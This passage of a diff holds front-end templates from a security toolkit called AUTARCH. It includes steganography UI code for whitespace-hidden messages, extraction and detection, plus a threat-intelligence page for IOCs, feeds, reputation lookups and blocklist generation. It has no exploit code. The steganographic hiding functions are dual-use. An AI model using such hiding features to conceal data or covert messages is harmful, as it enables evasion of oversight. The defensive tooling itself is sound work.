var cover = document.getElementById('ws-cover').value;
|
||||
var hidden = document.getElementById('ws-hidden').value;
|
||||
if (!cover || !hidden) { alert('Enter both cover text and hidden message.'); return; }
|
||||
postJSON('/stego/whitespace/encode', {cover: cover, hidden: hidden}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('ws-result').value = data.encoded || '';
|
||||
});
|
||||
}
|
||||
|
||||
function wsDecode() {
|
||||
var text = document.getElementById('ws-result').value || document.getElementById('ws-cover').value;
|
||||
if (!text) { alert('Enter encoded text in the Cover Text or Result field.'); return; }
|
||||
postJSON('/stego/whitespace/decode', {text: text}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('ws-hidden').value = data.decoded || '';
|
||||
document.getElementById('ws-result').value = 'Decoded: ' + (data.decoded || '(empty)');
|
||||
});
|
||||
}
|
||||
|
||||
function wsCopy() {
|
||||
var el = document.getElementById('ws-result');
|
||||
if (!el.value) return;
|
||||
navigator.clipboard.writeText(el.value).then(function() {
|
||||
alert('Copied to clipboard (including invisible characters).');
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Extract ── */
|
||||
function stegoExtract() {
|
||||
var file = document.getElementById('extract-file').value.trim();
|
||||
if (!file) { alert('Enter a file path.'); return; }
|
||||
var btn = document.getElementById('btn-extract');
|
||||
setLoading(btn, true);
|
||||
postJSON('/stego/extract', {
|
||||
file: file,
|
||||
password: document.getElementById('extract-password').value,
|
||||
method: document.getElementById('extract-method').value,
|
||||
format: document.getElementById('extract-format').value
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('extract-result', 'Error: ' + data.error); return; }
|
||||
if (data.format === 'hex') {
|
||||
renderOutput('extract-result', data.hex || 'No data extracted.');
|
||||
} else if (data.format === 'raw' && data.download_url) {
|
||||
document.getElementById('extract-result').innerHTML =
|
||||
'Binary data extracted. <a href="' + esc(data.download_url)
|
||||
+ '" download>Download file</a> (' + esc(data.size || '?') + ' bytes)';
|
||||
} else {
|
||||
renderOutput('extract-result', data.text || data.message || 'No hidden data found.');
|
||||
}
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Detect ── */
|
||||
function stegoDetect() {
|
||||
var file = document.getElementById('detect-file').value.trim();
|
||||
if (!file) { alert('Enter a file path to analyze.'); return; }
|
||||
var btn = document.getElementById('btn-detect');
|
||||
setLoading(btn, true);
|
||||
postJSON('/stego/detect', {file: file}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('detect-stats-table', data.error); return; }
|
||||
|
||||
document.getElementById('detect-results').style.display = '';
|
||||
|
||||
// Verdict
|
||||
var verdictEl = document.getElementById('detect-verdict');
|
||||
var verdict = data.verdict || 'unknown';
|
||||
verdictEl.textContent = verdict.toUpperCase();
|
||||
verdictEl.style.color = verdict === 'clean' ? 'var(--success)'
|
||||
: verdict === 'suspicious' ? 'var(--warning)' : 'var(--danger)';
|
||||
|
||||
// Confidence bar
|
||||
var conf = data.confidence || 0;
|
||||
var confBar = document.getElementById('detect-conf-bar');
|
||||
confBar.style.width = conf + '%';
|
||||
confBar.style.background = conf < 30 ? 'var(--success)' : conf < 70 ? 'var(--warning)' : 'var(--danger)';
|
||||
document.getElementById('detect-conf-pct').textContent = conf + '%';
|
||||
|
||||
// File info
|
||||
var info = [];
|
||||
if (data.file_type) info.push('Type: ' + data.file_type);
|
||||
if (data.file_size) info.push('Size: ' + data.file_size);
|
||||
if (data.dimensions) info.push('Dimensions: ' + data.dimensions);
|
||||
document.getElementById('detect-file-info').textContent = info.join(' | ') || '--';
|
||||
|
||||
// Stats table
|
||||
var stats = data.statistics || [];
|
||||
if (stats.length) {
|
||||
var shtml = '';
|
||||
stats.forEach(function(s) {
|
||||
var passed = s.suspicious ? false : true;
|
||||
shtml += '<tr>'
|
||||
+ '<td>' + esc(s.test) + '</td>'
|
||||
+ '<td><code>' + esc(s.value) + '</code></td>'
|
||||
+ '<td>' + esc(s.threshold || '--') + '</td>'
|
||||
+ '<td><span class="badge ' + (passed ? 'badge-pass' : 'badge-fail') + '">'
|
||||
+ (passed ? 'PASS' : 'SUSPICIOUS') + '</span></td></tr>';
|
||||
});
|
||||
document.getElementById('detect-stats-table').innerHTML = shtml;
|
||||
} else {
|
||||
document.getElementById('detect-stats-table').innerHTML =
|
||||
'<tr><td colspan="4" class="empty-state">No statistical tests available for this file type.</td></tr>';
|
||||
}
|
||||
|
||||
// Indicators
|
||||
var indicators = data.indicators || [];
|
||||
var iContainer = document.getElementById('detect-indicators');
|
||||
if (indicators.length) {
|
||||
var ihtml = '';
|
||||
indicators.forEach(function(ind) {
|
||||
var sevCls = ind.severity === 'high' ? 'badge-high'
|
||||
: ind.severity === 'medium' ? 'badge-medium' : 'badge-low';
|
||||
ihtml += '<div class="threat-item">'
|
||||
+ '<span class="badge ' + sevCls + '">' + esc(ind.severity || 'info') + '</span>'
|
||||
+ '<div><div class="threat-message">' + esc(ind.message) + '</div>'
|
||||
+ '<div class="threat-category">' + esc(ind.detail || '') + '</div>'
|
||||
+ '</div></div>';
|
||||
});
|
||||
iContainer.innerHTML = ihtml;
|
||||
} else {
|
||||
iContainer.innerHTML = '<div class="empty-state">No specific indicators found.</div>';
|
||||
}
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function stegoBatchScan() {
|
||||
var dir = document.getElementById('batch-dir').value.trim();
|
||||
if (!dir) { alert('Enter a directory path.'); return; }
|
||||
var btn = document.getElementById('btn-batch');
|
||||
setLoading(btn, true);
|
||||
renderOutput('batch-output', 'Scanning directory... this may take a while.');
|
||||
postJSON('/stego/batch-scan', {
|
||||
directory: dir,
|
||||
types: document.getElementById('batch-types').value
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('batch-output', 'Error: ' + data.error); return; }
|
||||
var results = data.results || [];
|
||||
if (!results.length) {
|
||||
renderOutput('batch-output', 'No files found or no steganographic content detected.');
|
||||
return;
|
||||
}
|
||||
var lines = ['=== Batch Scan Results ===',
|
||||
'Files scanned: ' + (data.total_scanned || results.length),
|
||||
'Suspicious: ' + (data.suspicious_count || 0), ''];
|
||||
results.forEach(function(r) {
|
||||
var flag = r.verdict === 'clean' ? '[CLEAN]'
|
||||
: r.verdict === 'suspicious' ? '[SUSPICIOUS]' : '[LIKELY STEGO]';
|
||||
lines.push(flag + ' ' + r.filename + ' (confidence: ' + (r.confidence || 0) + '%)');
|
||||
});
|
||||
renderOutput('batch-output', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
606
web/templates/threat_intel.html
Normal file
606
web/templates/threat_intel.html
Normal file
@ -0,0 +1,606 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Threat Intelligence{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Threat Intelligence</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
IOC management, threat feeds, and correlation analysis.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="ti" data-tab="iocs" onclick="showTab('ti','iocs')">IOCs</button>
|
||||
<button class="tab" data-tab-group="ti" data-tab="feeds" onclick="showTab('ti','feeds')">Feeds</button>
|
||||
<button class="tab" data-tab-group="ti" data-tab="correlate" onclick="showTab('ti','correlate')">Correlate</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== IOCs TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="ti" data-tab="iocs">
|
||||
|
||||
<div class="section">
|
||||
<h2>Add Indicator of Compromise</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>IOC Value</label>
|
||||
<input type="text" id="ioc-value" placeholder="IP, domain, hash, URL, email..." oninput="iocAutoType()">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>Type</label>
|
||||
<select id="ioc-type">
|
||||
<option value="auto">Auto-detect</option>
|
||||
<option value="ipv4">IPv4</option>
|
||||
<option value="ipv6">IPv6</option>
|
||||
<option value="domain">Domain</option>
|
||||
<option value="url">URL</option>
|
||||
<option value="email">Email</option>
|
||||
<option value="md5">MD5</option>
|
||||
<option value="sha1">SHA1</option>
|
||||
<option value="sha256">SHA256</option>
|
||||
<option value="filename">Filename</option>
|
||||
<option value="cve">CVE</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="max-width:140px">
|
||||
<label>Severity</label>
|
||||
<select id="ioc-severity">
|
||||
<option value="low">Low</option>
|
||||
<option value="medium" selected>Medium</option>
|
||||
<option value="high">High</option>
|
||||
<option value="critical">Critical</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Tags (comma-separated)</label>
|
||||
<input type="text" id="ioc-tags" placeholder="malware, phishing, c2, apt...">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Description</label>
|
||||
<input type="text" id="ioc-desc" placeholder="Brief description">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary" onclick="iocAdd()">Add IOC</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>IOC Database</h2>
|
||||
<div class="input-row">
|
||||
<input type="text" id="ioc-search" placeholder="Search IOCs..." oninput="iocFilter()">
|
||||
<select id="ioc-filter-type" onchange="iocFilter()" style="max-width:150px">
|
||||
<option value="">All Types</option>
|
||||
<option value="ipv4">IPv4</option>
|
||||
<option value="ipv6">IPv6</option>
|
||||
<option value="domain">Domain</option>
|
||||
<option value="url">URL</option>
|
||||
<option value="email">Email</option>
|
||||
<option value="md5">MD5</option>
|
||||
<option value="sha1">SHA1</option>
|
||||
<option value="sha256">SHA256</option>
|
||||
<option value="filename">Filename</option>
|
||||
<option value="cve">CVE</option>
|
||||
</select>
|
||||
<select id="ioc-filter-severity" onchange="iocFilter()" style="max-width:130px">
|
||||
<option value="">All Severities</option>
|
||||
<option value="critical">Critical</option>
|
||||
<option value="high">High</option>
|
||||
<option value="medium">Medium</option>
|
||||
<option value="low">Low</option>
|
||||
</select>
|
||||
</div>
|
||||
<div style="max-height:500px;overflow-y:auto">
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Value</th><th>Type</th><th>Severity</th>
|
||||
<th>Tags</th><th>Added</th><th>Actions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="ioc-table">
|
||||
<tr><td colspan="6" class="empty-state">No IOCs loaded. Add one above or import.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div style="margin-top:8px;font-size:0.8rem;color:var(--text-muted)">
|
||||
Showing <span id="ioc-count">0</span> indicators
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Bulk Import / Export</h2>
|
||||
<div class="form-group">
|
||||
<label>Bulk Import (one IOC per line, or paste JSON/CSV)</label>
|
||||
<textarea id="ioc-bulk-input" rows="6" placeholder="192.168.1.1 evil-domain.com d41d8cd98f00b204e9800998ecf8427e ..."></textarea>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary btn-small" onclick="iocBulkImport()">Import</button>
|
||||
<button class="btn btn-small" onclick="iocExport('json')">Export JSON</button>
|
||||
<button class="btn btn-small" onclick="iocExport('csv')">Export CSV</button>
|
||||
<button class="btn btn-small" onclick="iocExport('stix')">Export STIX</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="ioc-import-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== FEEDS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="ti" data-tab="feeds">
|
||||
|
||||
<div class="section">
|
||||
<h2>Add Threat Feed</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Feed Name</label>
|
||||
<input type="text" id="feed-name" placeholder="e.g. AlienVault OTX">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>Type</label>
|
||||
<select id="feed-type">
|
||||
<option value="url_list">URL List (plaintext)</option>
|
||||
<option value="csv">CSV</option>
|
||||
<option value="json">JSON</option>
|
||||
<option value="stix">STIX/TAXII</option>
|
||||
<option value="misp">MISP</option>
|
||||
<option value="api">REST API</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Feed URL</label>
|
||||
<input type="text" id="feed-url" placeholder="https://feeds.example.com/indicators.txt">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:220px">
|
||||
<label>API Key (optional)</label>
|
||||
<input type="password" id="feed-apikey" placeholder="API key">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary" onclick="feedAdd()">Add Feed</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Configured Feeds</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="feedRefresh()">Refresh List</button>
|
||||
<button class="btn btn-primary btn-small" onclick="feedFetchAll()">Fetch All Feeds</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Name</th><th>Type</th><th>URL</th><th>IOCs</th>
|
||||
<th>Last Fetched</th><th>Actions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="feed-table">
|
||||
<tr><td colspan="6" class="empty-state">No feeds configured.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Feed Statistics</h2>
|
||||
<div class="stats-grid" id="feed-stats">
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Total Feeds</div>
|
||||
<div class="stat-value" id="stat-total-feeds">0</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Total IOCs from Feeds</div>
|
||||
<div class="stat-value" id="stat-feed-iocs">0</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Last Updated</div>
|
||||
<div class="stat-value small" id="stat-last-update">--</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== CORRELATE TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="ti" data-tab="correlate">
|
||||
|
||||
<div class="section">
|
||||
<h2>Reputation Lookup</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Check IP/domain/hash reputation against VirusTotal, AbuseIPDB, and local IOC database.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Query (IP, domain, or hash)</label>
|
||||
<input type="text" id="rep-query" placeholder="8.8.8.8 or evil.com or sha256...">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:180px">
|
||||
<label>Service</label>
|
||||
<select id="rep-service">
|
||||
<option value="all">All Services</option>
|
||||
<option value="local">Local IOC DB</option>
|
||||
<option value="virustotal">VirusTotal</option>
|
||||
<option value="abuseipdb">AbuseIPDB</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="max-width:280px">
|
||||
<label>VirusTotal API Key</label>
|
||||
<input type="password" id="vt-apikey" placeholder="VT API key (saved in session)">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:280px">
|
||||
<label>AbuseIPDB API Key</label>
|
||||
<input type="password" id="abuse-apikey" placeholder="AbuseIPDB API key">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-rep-lookup" class="btn btn-primary" onclick="repLookup()">Lookup</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="rep-output"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Blocklist Generator</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Generate blocklists from your IOC database for firewalls and security tools.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="max-width:200px">
|
||||
<label>Output Format</label>
|
||||
<select id="bl-format">
|
||||
<option value="plain">Plain (one per line)</option>
|
||||
<option value="iptables">iptables rules</option>
|
||||
<option value="pf">PF (BSD)</option>
|
||||
<option value="nginx">Nginx deny</option>
|
||||
<option value="hosts">Hosts file</option>
|
||||
<option value="snort">Snort rules</option>
|
||||
<option value="suricata">Suricata rules</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="max-width:200px">
|
||||
<label>Minimum Severity</label>
|
||||
<select id="bl-severity">
|
||||
<option value="low">Low+</option>
|
||||
<option value="medium" selected>Medium+</option>
|
||||
<option value="high">High+</option>
|
||||
<option value="critical">Critical only</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>IOC Types</label>
|
||||
<select id="bl-type">
|
||||
<option value="all">All</option>
|
||||
<option value="ipv4">IPs only</option>
|
||||
<option value="domain">Domains only</option>
|
||||
<option value="url">URLs only</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary btn-small" onclick="blGenerate()">Generate Blocklist</button>
|
||||
<button class="btn btn-small" onclick="blCopy()">Copy to Clipboard</button>
|
||||
<button class="btn btn-small" onclick="blDownload()">Download</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="bl-output"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Alerts</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="alertsRefresh()">Refresh Alerts</button>
|
||||
<button class="btn btn-danger btn-small" onclick="alertsClearAll()">Clear All</button>
|
||||
</div>
|
||||
<div id="alerts-list" style="max-height:400px;overflow-y:auto">
|
||||
<div class="empty-state">No alerts. Alerts appear when IOCs match network traffic or log data.</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── Threat Intelligence ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var _iocCache = [];
|
||||
|
||||
function sevBadge(sev) {
|
||||
var cls = sev === 'critical' ? 'badge-fail' : sev === 'high' ? 'badge-high'
|
||||
: sev === 'medium' ? 'badge-medium' : 'badge-low';
|
||||
return '<span class="badge ' + cls + '">' + esc(sev) + '</span>';
|
||||
}
|
||||
|
||||
/* ── Auto-detect IOC type ── */
|
||||
function iocAutoType() {
|
||||
var v = document.getElementById('ioc-value').value.trim();
|
||||
var sel = document.getElementById('ioc-type');
|
||||
if (!v || sel.value !== 'auto') return;
|
||||
// Keep on auto, but show detected type via placeholder
|
||||
}
|
||||
|
||||
function iocDetectType(val) {
|
||||
if (/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(\/\d+)?$/.test(val)) return 'ipv4';
|
||||
if (/^[0-9a-fA-F:]{3,}$/.test(val) && val.indexOf(':') > 0) return 'ipv6';
|
||||
if (/^https?:\/\//i.test(val)) return 'url';
|
||||
if (/^[^@]+@[^@]+\.[^@]+$/.test(val)) return 'email';
|
||||
if (/^[a-fA-F0-9]{32}$/.test(val)) return 'md5';
|
||||
if (/^[a-fA-F0-9]{40}$/.test(val)) return 'sha1';
|
||||
if (/^[a-fA-F0-9]{64}$/.test(val)) return 'sha256';
|
||||
if (/^CVE-\d{4}-\d+$/i.test(val)) return 'cve';
|
||||
if (/^[a-zA-Z0-9]([a-zA-Z0-9-]*\.)+[a-zA-Z]{2,}$/.test(val)) return 'domain';
|
||||
return 'filename';
|
||||
}
|
||||
|
||||
function iocAdd() {
|
||||
var value = document.getElementById('ioc-value').value.trim();
|
||||
if (!value) { alert('Enter an IOC value.'); return; }
|
||||
var iocType = document.getElementById('ioc-type').value;
|
||||
if (iocType === 'auto') iocType = iocDetectType(value);
|
||||
postJSON('/threat-intel/ioc/add', {
|
||||
value: value,
|
||||
type: iocType,
|
||||
severity: document.getElementById('ioc-severity').value,
|
||||
tags: document.getElementById('ioc-tags').value.trim(),
|
||||
description: document.getElementById('ioc-desc').value.trim()
|
||||
}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('ioc-value').value = '';
|
||||
document.getElementById('ioc-tags').value = '';
|
||||
document.getElementById('ioc-desc').value = '';
|
||||
iocLoad();
|
||||
});
|
||||
}
|
||||
|
||||
function iocLoad() {
|
||||
fetchJSON('/threat-intel/iocs').then(function(data) {
|
||||
_iocCache = data.iocs || [];
|
||||
iocRender(_iocCache);
|
||||
});
|
||||
}
|
||||
|
||||
function iocRender(iocs) {
|
||||
var tbody = document.getElementById('ioc-table');
|
||||
document.getElementById('ioc-count').textContent = iocs.length;
|
||||
if (!iocs.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="6" class="empty-state">No IOCs match filters.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
iocs.forEach(function(ioc) {
|
||||
var tags = (ioc.tags || '').split(',').filter(Boolean).map(function(t) {
|
||||
return '<span style="background:var(--bg-input);padding:1px 6px;border-radius:4px;font-size:0.72rem;margin-right:3px">' + esc(t.trim()) + '</span>';
|
||||
}).join('');
|
||||
html += '<tr>'
|
||||
+ '<td><code style="font-size:0.8rem">' + esc(ioc.value) + '</code></td>'
|
||||
+ '<td>' + esc(ioc.type) + '</td>'
|
||||
+ '<td>' + sevBadge(ioc.severity) + '</td>'
|
||||
+ '<td>' + tags + '</td>'
|
||||
+ '<td style="font-size:0.8rem;color:var(--text-muted)">' + esc(ioc.added || '--') + '</td>'
|
||||
+ '<td><button class="btn btn-danger btn-small" onclick="iocDelete(\'' + esc(ioc.id || ioc.value) + '\')">Delete</button></td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function iocFilter() {
|
||||
var q = document.getElementById('ioc-search').value.trim().toLowerCase();
|
||||
var typeF = document.getElementById('ioc-filter-type').value;
|
||||
var sevF = document.getElementById('ioc-filter-severity').value;
|
||||
var filtered = _iocCache.filter(function(ioc) {
|
||||
if (typeF && ioc.type !== typeF) return false;
|
||||
if (sevF && ioc.severity !== sevF) return false;
|
||||
if (q && ioc.value.toLowerCase().indexOf(q) < 0
|
||||
&& (ioc.tags || '').toLowerCase().indexOf(q) < 0
|
||||
&& (ioc.description || '').toLowerCase().indexOf(q) < 0) return false;
|
||||
return true;
|
||||
});
|
||||
iocRender(filtered);
|
||||
}
|
||||
|
||||
function iocDelete(id) {
|
||||
if (!confirm('Delete this IOC?')) return;
|
||||
postJSON('/threat-intel/ioc/delete', {id: id}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
iocLoad();
|
||||
});
|
||||
}
|
||||
|
||||
function iocBulkImport() {
|
||||
var raw = document.getElementById('ioc-bulk-input').value.trim();
|
||||
if (!raw) { alert('Enter IOCs to import.'); return; }
|
||||
postJSON('/threat-intel/ioc/bulk-import', {data: raw}).then(function(data) {
|
||||
if (data.error) { renderOutput('ioc-import-output', 'Error: ' + data.error); return; }
|
||||
renderOutput('ioc-import-output', 'Imported ' + (data.imported || 0) + ' IOCs. Skipped: ' + (data.skipped || 0));
|
||||
document.getElementById('ioc-bulk-input').value = '';
|
||||
iocLoad();
|
||||
});
|
||||
}
|
||||
|
||||
function iocExport(format) {
|
||||
window.open('/threat-intel/ioc/export?format=' + encodeURIComponent(format), '_blank');
|
||||
}
|
||||
|
||||
/* ── Feeds ── */
|
||||
function feedAdd() {
|
||||
var name = document.getElementById('feed-name').value.trim();
|
||||
var url = document.getElementById('feed-url').value.trim();
|
||||
if (!name || !url) { alert('Feed name and URL are required.'); return; }
|
||||
postJSON('/threat-intel/feed/add', {
|
||||
name: name,
|
||||
type: document.getElementById('feed-type').value,
|
||||
url: url,
|
||||
api_key: document.getElementById('feed-apikey').value.trim()
|
||||
}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('feed-name').value = '';
|
||||
document.getElementById('feed-url').value = '';
|
||||
document.getElementById('feed-apikey').value = '';
|
||||
feedRefresh();
|
||||
});
|
||||
}
|
||||
|
||||
function feedRefresh() {
|
||||
fetchJSON('/threat-intel/feeds').then(function(data) {
|
||||
var feeds = data.feeds || [];
|
||||
document.getElementById('stat-total-feeds').textContent = feeds.length;
|
||||
document.getElementById('stat-feed-iocs').textContent = data.total_iocs || 0;
|
||||
document.getElementById('stat-last-update').textContent = data.last_update || '--';
|
||||
if (!feeds.length) {
|
||||
document.getElementById('feed-table').innerHTML =
|
||||
'<tr><td colspan="6" class="empty-state">No feeds configured.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
feeds.forEach(function(f) {
|
||||
html += '<tr>'
|
||||
+ '<td>' + esc(f.name) + '</td>'
|
||||
+ '<td>' + esc(f.type) + '</td>'
|
||||
+ '<td style="max-width:250px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">'
|
||||
+ '<a href="' + esc(f.url) + '" target="_blank">' + esc(f.url) + '</a></td>'
|
||||
+ '<td>' + esc(f.ioc_count || 0) + '</td>'
|
||||
+ '<td style="font-size:0.8rem;color:var(--text-muted)">' + esc(f.last_fetched || 'never') + '</td>'
|
||||
+ '<td>'
|
||||
+ '<button class="btn btn-primary btn-small" onclick="feedFetch(\'' + esc(f.id || f.name) + '\')">Fetch</button> '
|
||||
+ '<button class="btn btn-danger btn-small" onclick="feedDelete(\'' + esc(f.id || f.name) + '\')">Delete</button>'
|
||||
+ '</td></tr>';
|
||||
});
|
||||
document.getElementById('feed-table').innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function feedFetch(id) {
|
||||
postJSON('/threat-intel/feed/fetch', {id: id}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
alert('Fetched ' + (data.new_iocs || 0) + ' new IOCs from feed.');
|
||||
feedRefresh();
|
||||
iocLoad();
|
||||
});
|
||||
}
|
||||
|
||||
function feedFetchAll() {
|
||||
postJSON('/threat-intel/feed/fetch-all', {}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
alert('Fetched ' + (data.total_new || 0) + ' new IOCs from all feeds.');
|
||||
feedRefresh();
|
||||
iocLoad();
|
||||
});
|
||||
}
|
||||
|
||||
function feedDelete(id) {
|
||||
if (!confirm('Delete this feed?')) return;
|
||||
postJSON('/threat-intel/feed/delete', {id: id}).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
feedRefresh();
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Correlation ── */
|
||||
function repLookup() {
|
||||
var query = document.getElementById('rep-query').value.trim();
|
||||
if (!query) { alert('Enter an IP, domain, or hash to look up.'); return; }
|
||||
var btn = document.getElementById('btn-rep-lookup');
|
||||
setLoading(btn, true);
|
||||
postJSON('/threat-intel/correlate/lookup', {
|
||||
query: query,
|
||||
service: document.getElementById('rep-service').value,
|
||||
vt_key: document.getElementById('vt-apikey').value.trim(),
|
||||
abuse_key: document.getElementById('abuse-apikey').value.trim()
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('rep-output', 'Error: ' + data.error); return; }
|
||||
var lines = ['=== Reputation Report: ' + query + ' ===', ''];
|
||||
if (data.local) {
|
||||
lines.push('--- Local IOC DB ---');
|
||||
lines.push(' Match: ' + (data.local.found ? 'YES' : 'No'));
|
||||
if (data.local.found) {
|
||||
lines.push(' Severity: ' + data.local.severity);
|
||||
lines.push(' Tags: ' + (data.local.tags || 'none'));
|
||||
}
|
||||
lines.push('');
|
||||
}
|
||||
if (data.virustotal) {
|
||||
lines.push('--- VirusTotal ---');
|
||||
lines.push(' Malicious: ' + (data.virustotal.malicious || 0) + '/' + (data.virustotal.total || 0) + ' engines');
|
||||
lines.push(' Reputation: ' + (data.virustotal.reputation || '--'));
|
||||
if (data.virustotal.tags) lines.push(' Tags: ' + data.virustotal.tags);
|
||||
lines.push('');
|
||||
}
|
||||
if (data.abuseipdb) {
|
||||
lines.push('--- AbuseIPDB ---');
|
||||
lines.push(' Confidence Score: ' + (data.abuseipdb.confidence || 0) + '%');
|
||||
lines.push(' Total Reports: ' + (data.abuseipdb.total_reports || 0));
|
||||
lines.push(' Country: ' + (data.abuseipdb.country || '--'));
|
||||
lines.push(' ISP: ' + (data.abuseipdb.isp || '--'));
|
||||
lines.push('');
|
||||
}
|
||||
renderOutput('rep-output', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function blGenerate() {
|
||||
postJSON('/threat-intel/blocklist/generate', {
|
||||
format: document.getElementById('bl-format').value,
|
||||
min_severity: document.getElementById('bl-severity').value,
|
||||
ioc_type: document.getElementById('bl-type').value
|
||||
}).then(function(data) {
|
||||
if (data.error) { renderOutput('bl-output', 'Error: ' + data.error); return; }
|
||||
renderOutput('bl-output', data.blocklist || 'No IOCs match the selected criteria.');
|
||||
});
|
||||
}
|
||||
|
||||
function blCopy() {
|
||||
var el = document.getElementById('bl-output');
|
||||
if (!el.textContent) return;
|
||||
navigator.clipboard.writeText(el.textContent).then(function() {
|
||||
alert('Blocklist copied to clipboard.');
|
||||
});
|
||||
}
|
||||
|
||||
function blDownload() {
|
||||
